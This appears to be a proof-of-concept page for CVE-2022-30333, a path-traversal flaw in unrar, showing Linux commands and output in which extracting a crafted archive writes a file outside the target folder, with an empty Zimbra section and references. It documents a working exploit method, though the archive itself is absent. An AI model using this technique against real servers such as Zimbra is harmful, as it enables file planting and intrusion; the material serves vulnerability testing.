Home

Awesome

CVE-2022-30333-POC

Sample file to test CVE-2022-30333

EXPLOITATION STEPS

Testing on Linux

mkdir ../../tmp/traversed (the destination folder must exsist before unrar)

ls -la ../../tmp/traversed/
total 8
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:44 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..

unrar x exp.rar

UNRAR 6.10 beta 1 freeware      Copyright (c) 1993-2021 Alexander Roshal

Corrupt header is found
sym - the file header is corrupt

Extracting from exp.rar

Corrupt header is found
sym - the file header is corrupt
Extracting  sym                                                       OK 
Extracting  sym/trav                                                  OK 
Total errors: 4

ls -la ../../tmp/traversed/
total 12
drwxrwxr-x 2 ubuntu ubuntu 4096 Jul  4 02:47 .
drwxrwxr-x 4 ubuntu ubuntu 4096 Jul  4 02:40 ..
-rw-rw-r-- 1 ubuntu ubuntu   14 Jul  4 02:34 trav

cat ../../tmp/traversed/trav
"traversed"

Testing on Zimbra

REFERENCES

  1. Vietnamese blog from DEV2SEC
  2. English blog from Sonarsource
  3. Special thanks to mrlihd for helping me rebuild attack-chain in Zimbra